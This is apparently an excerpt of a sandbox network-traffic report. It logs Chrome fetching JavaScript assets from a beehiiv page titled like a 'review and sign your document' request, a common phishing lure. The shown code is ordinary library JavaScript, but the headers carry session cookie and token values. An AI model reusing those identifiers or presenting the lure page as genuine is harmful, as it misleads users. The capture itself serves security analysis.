                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 5b 79 5d 29 3b 2f 2a 2a 0a 20 2a 20 40 72 65 6d 69 78 2d 72 75 6e 2f 72 6f 75 74 65 72 20 76 31 2e 31 36 2e 31 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 52 65 6d 69 78 20 53 6f 66 74 77 61 72 65 20 49 6e 63 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 2e 6d 64 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 20 2a 2f 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 72 65 74 75 72 6e 20 4e 3d 4f
                                                                                                                                            Data Ascii: [y]);/** * @remix-run/router v1.16.1 * * Copyright (c) Remix Software Inc. * * This source code is licensed under the MIT license found in the * LICENSE.md file in the root directory of this source tree. * * @license MIT */function N(){return N=O
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 22 3f 72 3a 22 3f 22 2b 72 29 2c 6e 26 26 6e 21 3d 3d 22 23 22 26 26 28 74 2b 3d 6e 2e 63 68 61 72 41 74 28 30 29 3d 3d 3d 22 23 22 3f 6e 3a 22 23 22 2b 6e 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 29 7b 6c 65 74 20 74 3d 7b 7d 3b 69 66 28 65 29 7b 6c 65 74 20 72 3d 65 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 3b 72 3e 3d 30 26 26 28 74 2e 68 61 73 68 3d 65 2e 73 75 62 73 74 72 28 72 29 2c 65 3d 65 2e 73 75 62 73 74 72 28 30 2c 72 29 29 3b 6c 65 74 20 6e 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3b 6e 3e 3d 30 26 26 28 74 2e 73 65 61 72 63 68 3d 65 2e 73 75 62 73 74 72 28 6e 29 2c 65 3d 65 2e 73 75 62 73 74 72 28 30 2c 6e 29 29 2c 65 26 26 28 74 2e 70 61 74 68 6e 61 6d 65 3d 65 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 67 6e 28
                                                                                                                                            Data Ascii: "?r:"?"+r),n&&n!=="#"&&(t+=n.charAt(0)==="#"?n:"#"+n),t}function be(e){let t={};if(e){let r=e.indexOf("#");r>=0&&(t.hash=e.substr(r),e=e.substr(0,r));let n=e.indexOf("?");n>=0&&(t.search=e.substr(n),e=e.substr(0,n)),e&&(t.pathname=e)}return t}function gn(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 51 74 2c 70 29 2c 75 3d 44 2c 28 29 3d 3e 7b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 51 74 2c 70 29 2c 75 3d 6e 75 6c 6c 7d 7d 2c 63 72 65 61 74 65 48 72 65 66 28 44 29 7b 72 65 74 75 72 6e 20 74 28 61 2c 44 29 7d 2c 63 72 65 61 74 65 55 52 4c 3a 78 2c 65 6e 63 6f 64 65 4c 6f 63 61 74 69 6f 6e 28 44 29 7b 6c 65 74 20 4f 3d 78 28 44 29 3b 72 65 74 75 72 6e 7b 70 61 74 68 6e 61 6d 65 3a 4f 2e 70 61 74 68 6e 61 6d 65 2c 73 65 61 72 63 68 3a 4f 2e 73 65 61 72 63 68 2c 68 61 73 68 3a 4f 2e 68 61 73 68 7d 7d 2c 70 75 73 68 3a 76 2c 72 65 70 6c 61 63 65 3a 54 2c 67 6f 28 44 29 7b 72 65 74 75 72 6e 20 6f 2e 67 6f 28 44 29 7d 7d 3b 72 65 74 75 72 6e 20 77 7d 76 61 72 20 49 3b 28 66
                                                                                                                                            Data Ascii: a.addEventListener(Qt,p),u=D,()=>{a.removeEventListener(Qt,p),u=null}},createHref(D){return t(a,D)},createURL:x,encodeLocation(D){let O=x(D);return{pathname:O.pathname,search:O.search,hash:O.hash}},push:v,replace:T,go(D){return o.go(D)}};return w}var I;(f


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.1649730104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC845OUTGET /assets/components-Oj2xMfGE.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 44165
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"ac85-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89a3b3742d0-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 65 61 34 62 38 32 33 2d 37 64 37 37 2d 35 31 33 33 2d 39 62 33 39 2d 32 38 63 64 32 33 35 61 66 37 37 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eea4b823-7d77-5133-9b39-28cd235af77e")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 76 74 2c 78 20 61 73 20 53 74 2c 79 20 61 73 20 77 74 2c 45 20 61 73 20 45 74 2c 7a 20 61 73 20 5f 74 2c 42 20 61 73 20 52 74 2c 43 20 61 73 20 55 65 2c 46 20 61 73 20 62 74 2c 47 20 61 73 20 78 74 2c 48 20 61 73 20 54 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 4c 74 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 63 6f 6e 73 74 20 6e 3d 74 5b 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 73 74 72 69 6e 67 22 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 7b 66 6f 72 28 63 6f 6e 73 74 20 61 20 69 6e 20 6e 29 69 66 28 61 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 21 28 61 20 69 6e 20 65 29 29 7b 63 6f 6e 73 74 20 69 3d
                                                                                                                                            Data Ascii: vt,x as St,y as wt,E as Et,z as _t,B as Rt,C as Ue,F as bt,G as xt,H as Tt}from"./index-D6da9p6-.js";function Lt(e,t){for(var r=0;r<t.length;r++){const n=t[r];if(typeof n!="string"&&!Array.isArray(n)){for(const a in n)if(a!=="default"&&!(a in e)){const i=
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 3b 72 65 74 75 72 6e 7b 24 24 74 79 70 65 6f 66 3a 50 74 2c 6b 65 79 3a 6e 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 22 22 2b 6e 2c 63 68 69 6c 64 72 65 6e 3a 65 2c 63 6f 6e 74 61 69 6e 65 72 49 6e 66 6f 3a 74 2c 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 3a 72 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 22 66 6f 6e 74 22 29 72 65 74 75 72 6e 22 22 3b 69 66 28 74 79 70 65 6f 66 20 74 3d 3d 22 73 74 72 69 6e 67 22 29 72 65 74 75 72 6e 20 74 3d 3d 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3f 74 3a 22 22 7d 4f 2e 5f 5f 44 4f 4d 5f 49 4e 54 45 52 4e 41 4c 53 5f 44 4f 5f 4e 4f 54 5f 55 53 45 5f 4f 52 5f 57 41 52 4e 5f 55 53 45 52 53 5f 54 48 45 59 5f 43 41 4e 4e 4f 54 5f 55 50 47 52 41 44 45 3d 43 3b 4f 2e 63 72 65 61 74
                                                                                                                                            Data Ascii: ;return{$$typeof:Pt,key:n==null?null:""+n,children:e,containerInfo:t,implementation:r}}function ne(e,t){if(e==="font")return"";if(typeof t=="string")return t==="use-credentials"?t:""}O.__DOM_INTERNALS_DO_NOT_USE_OR_WARN_USERS_THEY_CANNOT_UPGRADE=C;O.creat
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 74 79 70 65 6f 66 20 74 2e 69 6e 74 65 67 72 69 74 79 3d 3d 22 73 74 72 69 6e 67 22 3f 74 2e 69 6e 74 65 67 72 69 74 79 3a 76 6f 69 64 20 30 2c 6e 6f 6e 63 65 3a 74 79 70 65 6f 66 20 74 2e 6e 6f 6e 63 65 3d 3d 22 73 74 72 69 6e 67 22 3f 74 2e 6e 6f 6e 63 65 3a 76 6f 69 64 20 30 7d 29 7d 7d 65 6c 73 65 20 74 3d 3d 6e 75 6c 6c 26 26 43 2e 64 2e 4d 28 65 29 7d 3b 4f 2e 70 72 65 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 74 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 74 2e 61 73 3d 3d 22 73 74 72 69 6e 67 22 29 7b 76 61 72 20 72 3d 74 2e 61 73 2c 6e 3d 6e 65 28 72 2c 74 2e 63 72 6f 73 73 4f 72 69 67 69 6e 29 3b 43
                                                                                                                                            Data Ascii: typeof t.integrity=="string"?t.integrity:void 0,nonce:typeof t.nonce=="string"?t.nonce:void 0})}}else t==null&&C.d.M(e)};O.preload=function(e,t){if(typeof e=="string"&&typeof t=="object"&&t!==null&&typeof t.as=="string"){var r=t.as,n=ne(r,t.crossOrigin);C
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 74 72 79 7b 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 28 56 65 29 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 7d 56 65 28 29 2c 48 65 2e 65 78 70 6f 72 74 73 3d 4f 3b 76 61 72 20 4b 65 3d 48 65 2e 65 78 70 6f 72 74 73 3b 63 6f 6e 73 74 20 4f 74 3d 66 74 28 4b 65 29 2c 6b 74 3d 4c 74 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 64 65 66 61 75 6c 74 3a 4f 74 7d 2c 5b 4b 65 5d 29 3b 2f 2a 2a 0a 20 2a 20 52 65 61 63 74 20 52 6f 75 74 65 72 20 44 4f 4d 20 76 36 2e 32 33 2e 31 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 52 65 6d 69 78 20 53 6f 66 74 77 61 72 65 20 49 6e 63 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63
                                                                                                                                            Data Ascii: try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(Ve)}catch(e){console.error(e)}}Ve(),He.exports=O;var Ke=He.exports;const Ot=ft(Ke),kt=Lt({__proto__:null,default:Ot},[Ke]);/** * React Router DOM v6.23.1 * * Copyright (c) Remix Software Inc. * * This sourc
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 74 2e 63 6f 6e 63 61 74 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 2e 6d 61 70 28 61 3d 3e 5b 72 2c 61 5d 29 3a 5b 5b 72 2c 6e 5d 5d 29 7d 2c 5b 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 46 74 28 65 2c 74 29 7b 6c 65 74 20 72 3d 6d 65 28 65 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 66 6f 72 45 61 63 68 28 28 6e 2c 61 29 3d 3e 7b 72 2e 68 61 73 28 61 29 7c 7c 74 2e 67 65 74 41 6c 6c 28 61 29 2e 66 6f 72 45 61 63 68 28 69 3d 3e 7b 72 2e 61 70 70 65 6e 64 28 61 2c 69 29 7d 29 7d 29 2c 72 7d 6c 65 74 20 57 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 4d 74 28 29 7b 69 66 28 57 3d 3d 3d 6e 75 6c 6c 29 74 72 79 7b 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 6f 72 6d 22 29 2c 30 29
                                                                                                                                            Data Ascii: t.concat(Array.isArray(n)?n.map(a=>[r,a]):[[r,n]])},[]))}function Ft(e,t){let r=me(e);return t&&t.forEach((n,a)=>{r.has(a)||t.getAll(a).forEach(i=>{r.append(a,i)})}),r}let W=null;function Mt(){if(W===null)try{new FormData(document.createElement("form"),0)
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6f 6e 73 74 20 48 74 3d 5b 22 6f 6e 43 6c 69 63 6b 22 2c 22 72 65 6c 61 74 69 76 65 22 2c 22 72 65 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 22 2c 22 72 65 70 6c 61 63 65 22 2c 22 73 74 61 74 65 22 2c 22 74 61 72 67 65 74 22 2c 22 74 6f 22 2c 22 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 22 2c 22 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 4a 74 3d 5b 22 61 72 69 61 2d 63 75 72 72 65 6e 74 22 2c 22 63 61 73 65 53 65 6e 73 69 74 69 76 65 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 65 6e 64 22 2c 22 73 74 79 6c 65 22 2c 22 74 6f 22 2c 22 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 56 74 3d 5b 22 66 65 74 63 68 65 72 4b 65 79 22 2c 22 6e 61 76 69 67 61
                                                                                                                                            Data Ascii: onst Ht=["onClick","relative","reloadDocument","replace","state","target","to","preventScrollReset","unstable_viewTransition"],Jt=["aria-current","caseSensitive","className","end","style","to","unstable_viewTransition","children"],Vt=["fetcherKey","naviga
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 77 69 6e 64 6f 77 3d 3d 6e 75 6c 6c 7c 7c 72 2e 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3d 3d 6e 75 6c 6c 7c 7c 74 79 70 65 6f 66 20 72 2e 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 73 74 61 72 74 56 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 21 3d 22 66 75 6e 63 74 69 6f 6e 22 3b 69 66 28 21 50 7c 7c 44 29 7b 78 3f 56 28 28 29 3d 3e 69 28 79 29 29 3a 76 28 28 29 3d 3e 69 28 79 29 29 3b 72 65 74 75 72 6e 7d 69 66 28 78 29 7b 56 28 28 29 3d 3e 7b 6d 26 26 28 66 26 26 66 2e 72 65 73 6f 6c 76 65 28 29 2c 6d 2e 73 6b 69 70 54 72 61 6e 73 69 74 69 6f 6e 28 29 29 2c 63 28 7b 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3a 21 30 2c 66 6c 75 73 68 53 79 6e 63 3a 21 30 2c 63 75 72 72 65 6e 74 4c 6f 63 61 74 69 6f 6e 3a 50 2e 63 75 72 72 65 6e 74 4c 6f 63 61
                                                                                                                                            Data Ascii: window==null||r.window.document==null||typeof r.window.document.startViewTransition!="function";if(!P||D){x?V(()=>i(y)):v(()=>i(y));return}if(x){V(()=>{m&&(f&&f.resolve(),m.skipTransition()),c({isTransitioning:!0,flushSync:!0,currentLocation:P.currentLoca
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 61 74 65 48 72 65 66 3a 72 2e 63 72 65 61 74 65 48 72 65 66 2c 65 6e 63 6f 64 65 4c 6f 63 61 74 69 6f 6e 3a 72 2e 65 6e 63 6f 64 65 4c 6f 63 61 74 69 6f 6e 2c 67 6f 3a 79 3d 3e 72 2e 6e 61 76 69 67 61 74 65 28 79 29 2c 70 75 73 68 3a 28 79 2c 45 2c 5f 29 3d 3e 72 2e 6e 61 76 69 67 61 74 65 28 79 2c 7b 73 74 61 74 65 3a 45 2c 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 3a 5f 3f 2e 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 7d 29 2c 72 65 70 6c 61 63 65 3a 28 79 2c 45 2c 5f 29 3d 3e 72 2e 6e 61 76 69 67 61 74 65 28 79 2c 7b 72 65 70 6c 61 63 65 3a 21 30 2c 73 74 61 74 65 3a 45 2c 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 3a 5f 3f 2e 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 7d 29 7d 29 2c 5b 72 5d 29 2c 4e 3d 72
                                                                                                                                            Data Ascii: ateHref:r.createHref,encodeLocation:r.encodeLocation,go:y=>r.navigate(y),push:(y,E,_)=>r.navigate(y,{state:E,preventScrollReset:_?.preventScrollReset}),replace:(y,E,_)=>r.navigate(y,{replace:!0,state:E,preventScrollReset:_?.preventScrollReset})}),[r]),N=r
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6d 65 2c 70 29 3b 62 2e 6f 72 69 67 69 6e 3d 3d 3d 77 2e 6f 72 69 67 69 6e 26 26 4e 21 3d 6e 75 6c 6c 3f 63 3d 4e 2b 62 2e 73 65 61 72 63 68 2b 62 2e 68 61 73 68 3a 67 3d 21 30 7d 63 61 74 63 68 7b 7d 6c 65 74 20 53 3d 76 65 28 63 2c 7b 72 65 6c 61 74 69 76 65 3a 61 7d 29 2c 52 3d 74 72 28 63 2c 7b 72 65 70 6c 61 63 65 3a 6c 2c 73 74 61 74 65 3a 6f 2c 74 61 72 67 65 74 3a 75 2c 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 3a 66 2c 72 65 6c 61 74 69 76 65 3a 61 2c 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 3a 64 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 76 28 77 29 7b 6e 26 26 6e 28 77 29 2c 77 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 7c 7c 52 28 77 29 7d 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e
                                                                                                                                            Data Ascii: me,p);b.origin===w.origin&&N!=null?c=N+b.search+b.hash:g=!0}catch{}let S=ve(c,{relative:a}),R=tr(c,{replace:l,state:o,target:u,preventScrollReset:f,relative:a,unstable_viewTransition:d});function v(w){n&&n(w),w.defaultPrevented||R(w)}return s.createElemen


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.1649732104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC842OUTGET /assets/context-CxfOs_9L.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1435
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"59b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89a58e2de93-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 32 65 32 33 31 62 63 2d 39 66 65 34 2d 35 38 34 35 2d 38 62 63 30 2d 35 63 34 64 36 36 37 66 64 33 38 36 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e2e231bc-9fe4-5845-8bc0-5c4d667fd386")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC978INData Raw: 3a 22 3c 22 2c 22 26 67 74 3b 22 3a 22 3e 22 2c 22 26 23 36 32 3b 22 3a 22 3e 22 2c 22 26 61 70 6f 73 3b 22 3a 22 27 22 2c 22 26 23 33 39 3b 22 3a 22 27 22 2c 22 26 71 75 6f 74 3b 22 3a 27 22 27 2c 22 26 23 33 34 3b 22 3a 27 22 27 2c 22 26 6e 62 73 70 3b 22 3a 22 20 22 2c 22 26 23 31 36 30 3b 22 3a 22 20 22 2c 22 26 63 6f 70 79 3b 22 3a 22 c2 a9 22 2c 22 26 23 31 36 39 3b 22 3a 22 c2 a9 22 2c 22 26 72 65 67 3b 22 3a 22 c2 ae 22 2c 22 26 23 31 37 34 3b 22 3a 22 c2 ae 22 2c 22 26 68 65 6c 6c 69 70 3b 22 3a 22 e2 80 a6 22 2c 22 26 23 38 32 33 30 3b 22 3a 22 e2 80 a6 22 2c 22 26 23 78 32 46 3b 22 3a 22 2f 22 2c 22 26 23 34 37 3b 22 3a 22 2f 22 7d 2c 63 3d 65 3d 3e 70 5b 65 5d 2c 75 3d 65 3d 3e 65 2e 72 65 70 6c 61 63 65 28 72 2c 63 29 3b 6c 65 74 20 74 3d 7b
                                                                                                                                            Data Ascii: :"<","&gt;":">","&#62;":">","&apos;":"'","&#39;":"'","&quot;":'"',"&#34;":'"',"&nbsp;":" ","&#160;":" ","&copy;":"","&#169;":"","&reg;":"","&#174;":"","&hellip;":"","&#8230;":"","&#x2F;":"/","&#47;":"/"},c=e=>p[e],u=e=>e.replace(r,c);let t={


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            20192.168.2.1649734104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC840OUTGET /assets/index-x2da_zcv.js HTTP/1.1
